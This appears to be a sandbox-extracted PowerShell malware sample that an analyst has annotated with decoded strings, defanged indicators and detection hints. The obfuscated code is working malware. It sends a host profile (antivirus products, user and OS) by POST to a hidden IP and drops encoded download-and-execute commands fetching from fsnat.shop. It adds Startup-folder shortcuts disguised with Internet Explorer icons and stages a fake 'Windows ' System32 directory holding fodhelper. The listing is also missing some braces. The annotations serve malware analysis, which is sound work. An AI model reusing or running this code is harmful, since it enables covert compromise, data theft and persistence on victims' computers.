Static | ZeroBOX
No static analysis available.
# Host-profiling beacon. Collects the registered antivirus product names, the
# user name, computer name, OS caption, UI culture and CPU bitness, and writes
# them as the body of one HTTP POST to a hard-coded, Base64-hidden URL.
# NOTE(review): this listing is a sandbox extraction and has lost lines; the
# closing ")" of param and the function's closing "}" are not visible here.
function ____///////// {
[cmdletBinding()]
param (
[string]$ComputerName = "$env:computername" ,
$Credential
BEGIN
{
# WQL query for the Security Center provider; the namespace is given in PROCESS.
$wmiQuery = "SELECT * FROM AntiVirusProduct"
}
PROCESS
{ $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
$AntivirusNames = $AntivirusProduct.displayName
$lang = Get-Culture
$lang = $lang.displayname
$winds = (Get-WmiObject -class Win32_OperatingSystem).Caption
if($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $Bits =" 32-Bit CPU "}Else{ $Bits =" 64-Bit CPU "}
# Network IoC: the literal is Base64 of a UTF-16LE string and decodes to
# hxxp://94.131.117[.]72/ldht/index.php (defanged in this comment only).
$WebRequest = [System.Net.WebRequest]::Create(([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA3AC4ANwAyAC8AbABkAGgAdAAvAGkAbgBkAGUAeAAuAHAAaABwAA=='))))
# Detection hint: the body is a space-separated host record that always starts with "AT= ".
$GlobalListStr = [System.Text.Encoding]::UTF8.GetBytes("AT= $env:USERNAME $env:computername $winds $AntivirusNames $lang $Bits ")
$WebRequest.Method = 'POST'
$WebRequest.ContentType = 'application/x-www-form-urlencoded'
$WebRequest.ContentLength = $GlobalListStr.length
# The body is written and the stream closed; GetResponse() is not called in the visible lines.
$RequestStream = $WebRequest.GetRequestStream()
$RequestStream.Write($GlobalListStr, 0, $GlobalListStr.length)
$RequestStream.Close()
}
END {
}
# String table. Every literal below is Base64 of a UTF-16LE string, decoded at
# run time so that paths, registry keys and file names do not appear in clear
# text. The decoded values are given in the comments (in source order) as an
# aid to triage and detection writing.
# File-type fragments: "cmd", "exe", ".png", "zip", "" (empty).
${_/|\_/|////\__|/_|\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwBtAGQA')))
${_/|\_/|////\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQB4AGUA')))
${__///\\\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBwAG4AZwA=')))
${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('egBpAHAA')))
${_/|\_/|////\__|//\\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('')))
# "c:\users\", "public", "c:\users\" again, then the joined staging path "c:\users\public".
${_/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwA6AFwAdQBzAGUAcgBzAFwA')))
${_/|\_/|/\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB1AGIAbABpAGMA')))
${_/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwA6AFwAdQBzAGUAcgBzAFwA')))
${_\\\\\\/|\_/|/\\\\\\\/|_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}"
# "Global", "DllCall", "STRUCT", "JLI_GetStdArgc", "DllOpen", "#NoTrayIcon".
# NOTE(review): these look like script keywords and an export name for a later
# stage; none of the six variables is referenced in the visible lines.
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\//_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwA')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\////_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBhAGwAbAA=')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBUAFIAVQBDAFQA')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SgBMAEkAXwBHAGUAdABTAHQAZABBAHIAZwBjAA==')))
${_\\/\/\//\/\\/\/\/\/\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwATwBwAGUAbgA=')))
${_\\/\/\//\/\\/\/\/\/\\\\\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IwBOAG8AVAByAGEAeQBJAGMAbwBuAA==')))
# Registry IoC: "HKCU:\Software\Classes\ms-settings\Shell\Open\command".
${_um_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkAA==')))
# Same key path followed by the cmdlet-argument fragment '" -Name "DelegateExecute" -Value "';
# this variable is not referenced in the visible lines.
${_dois_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIA')))
# Registry value names: "DelegateExecute" and "(default)".
${_tres_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQBnAGEAdABlAEUAeABlAGMAdQB0AGUA')))
${_qtro_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KABkAGUAZgBhAHUAbAB0ACkA')))
# "C:\Windows\System32\fodhelper.exe", "fodhelper.exe", and the look-alike
# directory "\\?\C:\Windows \System32\" (note the space after "Windows").
${_fiv_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUA')))
${_six_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQA=')))
${_sev_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABcAD8AXABDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAA=')))
# "1n ia" (not referenced in the visible lines) and the drive root "C:\".
${_\\\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQBuACAAaQBhAA==')))
${_\\///////////////////////_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwA')))
# Extensions and module names: ".txt", ".dll", ".exe", "jli", "MSVCR100", "WebView2Loader".
${_tx_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB0AHgAdAA=')))
${_dx_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBkAGwAbAA=')))
${_ex_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBlAHgAZQA=')))
${_jl_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('agBsAGkA')))
${_ms_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBTAFYAQwBSADEAMAAwAA==')))
${_wb_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBlAGIAVgBpAGUAdwAyAEwAbwBhAGQAZQByAA==')))
# Host name, reused below as part of dropped file names.
${_\\\\\\/|\\\\\\\\\\\\\\\\\_} = $env:COMPUTERNAME
# File name of the run-once marker that the script later checks for and writes under c:\users\public.
${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/} = "L21"
# Builds the random token that names this run's folder, files and shortcuts.
# Get-Random draws six lowercase letters, one "<digit>_" token and one
# uppercase letter; the pieces are appended to one string, which is returned
# with a leading "_". Names therefore differ per host, so detections should key
# on behaviour and location rather than on a fixed file name.
# NOTE(review): the closing braces are missing from this listing, so the exact
# nesting of the three foreach loops (and the order of the pieces) is unconfirmed.
Function ____////////\\\/\/\/\/\_____ {
${_|||||||||||||________________} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
${_|||||||||||||//////________________} = "2_","3_","4_","5_","6_","7_","8_","9_"
${_|||||||||||||//////\\\\\________________} = $null
${__|||||||||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________} -Count 6
${__||||||_|||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||//////________________} -Count 1
${__||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1
foreach($n in ${__|||||||||||||//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n
foreach ($n2 in ${__||||||_|||||||//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n2
foreach ($n3 in ${__||||||_||||||_|//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n3
return "_${_|||||||||||||//////\\\\\________________}"
# Main flow, part 1: pick the run token, stop if the host is already marked,
# send the host profile, create the staging folder and drop the encoded
# stage-2 command.
# Random run token; ${GER} holds the same value.
${_\\\\\\/|\_/|/\\\___\\\\/|_} = ____////////\\\/\/\/\/\_____
${GER} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
# Encoded command line. The generated .cmd launcher replaces each number 10-35
# with the letter a-z at that index and strips "@", which yields a PowerShell
# download-and-execute one-liner (Net.WebClient DownloadString piped to
# powershell.exe with -nop -win 1). Network IoC (defanged in this comment only):
# hxxps://fsnat[.]shop/a/08/150822/up/up
${/\/\/\/\__\\//___} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@30@25/@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
# Run-once guard: if the marker file "L21" already exists in the public staging
# directory, the script exits. The marker is a host-based IoC.
${_\\\\\__\/|\_/|/\\\___\\\\/|_} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
if ((${_\\\\\__\/|\_/|/\\\___\\\\/|_} | Test-Path)) {exit}
# Calls the host-profiling beacon function defined at the top of the script.
____/////////
# Staging folder: first tried at the drive root, named after the run token.
New-Item -ItemType directory -Path "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}"
$folderPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}"
# If that folder does not exist, fall back to a folder under the public profile.
# NOTE(review): the closing brace of the else branch is missing from this
# listing, so how many of the following lines belong to it is unconfirmed.
if (Test-Path -Path $folderPath -PathType Container) {
} else {
${_\\///////////////////////_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}"
New-Item -ItemType directory -Path "${_\\///////////////////////_}"
${_\\///////////////////////_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}\"
# Path prefix "<base><token>\<COMPUTERNAME>"; the encoded command is written to that prefix plus the token.
${//////////____zz//} = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}"
${ZZZZxxxx_} = ${/\/\/\/\__\\//___}
${ZZZZxxxx_} | Set-Content ${//////////____zz//}${GER}
# Token, token+"A" and token+"B"; none of the three is read again in the visible lines.
${\\/_} = (${_\\\\\\/|\_/|/\\\___\\\\/|_})
${\\/////\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "A")
${/\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "B")
# Deletes every .vbs, .lnk, .exe and .cmd file in the public staging directory.
# Forensic note: this also destroys unrelated files of those types in that directory.
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.vbs
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.lnk
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd
# Generates the batch launcher "<public dir>\<COMPUTERNAME><token>.cmd".
# The batch file reads the encoded command from the dropped data file into a
# variable named after the run token, replaces each number 10-36 with the
# character at that index of the "chars" alphabet, strips "@" and double
# quotes, and finally runs the decoded text as a command line.
# Detection hint: a .cmd in the public profile that combines "Set /P <var>=<file",
# "EnableDelayedExpansion" and a final bare "%<var>%" line.
${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}"
${\\\\__/////////} = "@Echo off`r`n"
${\\\\__/////////} += "Setlocal EnableExtensions`r`n"
${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n"
${\\\\__/////////} += "cd %SystemRoot%\System32`r`n"
# First line of the data file becomes the value of the variable.
${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"
${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
# Number-to-letter substitution loop (index 10 is "a", index 35 is "z").
${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"
${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
# Removes the "@" separators.
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n"
${\\\\__/////////} += ")`r`n"
# Removes double quotes.
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n"
${\\\\__/////////} += ")`r`n"
# Executes the decoded command line.
${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n"
${\\\\__/////////} | Set-Content ${/_//_//_/}
# Shortcut writer (".ai" variant). Saves a .lnk at the path given in the first
# parameter; the target is "<base><token>\<token>.exe" with "<token>.ai" from
# the same folder as its argument. The window style is 7 (minimized) and the
# icon is taken from "%ProgramFiles%\Internet Explorer\iexplore.exe,1", so the
# shortcut looks like Internet Explorer. The second parameter is never read.
# The only call to this function in the visible lines is commented out.
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\\\\\\\\\\/////
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Shortcut writer (".at" variant). Identical to the ".ai" variant except for the
# argument: the .lnk targets "<base><token>\<token>.exe" and passes
# "<token>.at" from the same folder. Minimized window (style 7), Internet
# Explorer icon, second parameter never read. The only call to this function
# in the visible lines is commented out.
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.at"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Shortcut writer (".bai" variant). The .lnk targets "<base><token>\<token>.exe"
# and passes "<token>.bai" from the same folder. Minimized window (style 7),
# Internet Explorer icon, second parameter never read. The only call to this
# function in the visible lines is commented out.
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\///////////////////////
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.bai"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Creates the look-alike directory "\\?\C:\Windows \System32\" (trailing space
# after "Windows", reachable only through the \\?\ prefix) and copies the
# genuine fodhelper.exe into it. This matches the "mock trusted directory"
# masquerading pattern. Detection hint: any directory named "Windows " (with a
# trailing space) at the drive root, or a fodhelper.exe image path outside the
# real System32.
${TESTE} = "${_sev_}"
New-Item ${TESTE} -ItemType Directory
Copy-Item -Path "${_fiv_}" -Destination "${TESTE}${_six_}" -Recurse
# Shortcut writer ("i7" variant). Saves a .lnk at the path given in the first
# parameter whose target is "<base><token>\<token>i7.exe", with no arguments.
# Minimized window (style 7), Internet Explorer icon, second parameter never
# read. The target file is not created anywhere in the visible lines, so it is
# presumably delivered by a later stage (unconfirmed).
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\____\\\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}i7${_ex_}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Shortcut writer (batch-launcher variant). Saves a .lnk at the path given in
# the first parameter whose target is whatever ${/_//_//_/} holds when the
# function is called, i.e. the generated .cmd launcher. Minimized window
# (style 7), Internet Explorer icon, second parameter never read.
# NOTE(review): the function's braces are missing from this listing.
function _____/\_/\/\_/\/=\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = ""
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
# Logon persistence through the current user's Startup folder.
# The Base64 literal decodes to "startup", so SpecialFolders.Item returns that folder's path.
${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
# Clears existing .vbs, .lnk, .exe and .cmd entries from the Startup folder.
# Forensic note: this removes legitimate autostart entries too, which is a
# useful tamper signal.
del ${/=\_/\_/===\/\/\/}\*.vbs
del ${/=\_/\_/===\/\/\/}\*.lnk
del ${/=\_/\_/===\/\/\/}\*.exe
del ${/=\_/\_/===\/\/\/}\*.cmd
# Second argument passed to the shortcut writers; both embedded variables are
# undefined in the visible lines and the writers never read this parameter.
${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
# "<Startup>\<token>.lnk" -> the generated .cmd launcher.
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
_____/\_/\/\_/\/=\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
# Disabled by the author: the "EX", "AT" and "bt" shortcut variants.
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}EX.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\///// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}AT.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}bt.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\/////////////////////// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
# "<Startup>\<token>AA.lnk" -> "<base><token>\<token>i7.exe".
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}AA.lnk"
_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\____\\\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
# Second encoded command and launcher, built the same way as the first but with
# a "y" suffix on the file names. After the number-to-letter substitution done
# by the generated .cmd, the string is again a PowerShell download-and-execute
# one-liner. Network IoC (defanged in this comment only):
# hxxps://fsnat[.]shop/a/08/150822/au/au
${/\/\/\/\__\\//___} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@10@30/@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
# Self-assignment; has no effect.
${_\\\\\\/|\_/|/\\\___\\\\/|_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
# Data file "<base><token>\<COMPUTERNAME><token>y" receives the encoded command.
${//////////____zz//} = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}"
${ZZZZxxxx_} = ${/\/\/\/\__\\//___}
${ZZZZxxxx_} | Set-Content ${//////////____zz//}${GER}y
# Token, token+"A" and token+"B"; none of the three is read again in the visible lines.
${\\/_} = (${_\\\\\\/|\_/|/\\\___\\\\/|_})
${\\/////\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "A")
${/\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "B")
# Launcher "<public dir>\<COMPUTERNAME><token>y.cmd": reads the data file,
# maps numbers 10-36 to characters of "chars", strips "@" and double quotes,
# then runs the decoded text as a command line.
${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}y.${_/|\_/|////\__|/_|\\_}"
${\\\\__/////////} = "@Echo off`r`n"
${\\\\__/////////} += "Setlocal EnableExtensions`r`n"
${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n"
${\\\\__/////////} += "cd %SystemRoot%\System32`r`n"
${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}y`"`r`n"
${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"
${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n"
${\\\\__/////////} | Set-Content ${/_//_//_/}
